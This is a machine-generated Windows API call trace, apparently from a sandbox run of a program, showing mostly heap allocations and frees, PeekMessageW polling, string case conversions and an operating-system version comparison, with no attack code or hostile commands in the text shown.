[0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.966] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.966] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.966] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.967] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.968] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.968] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.970] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.970] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0198.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0198.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.972] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.972] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.972] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.973] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.973] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.973] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0198.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.975] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.976] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 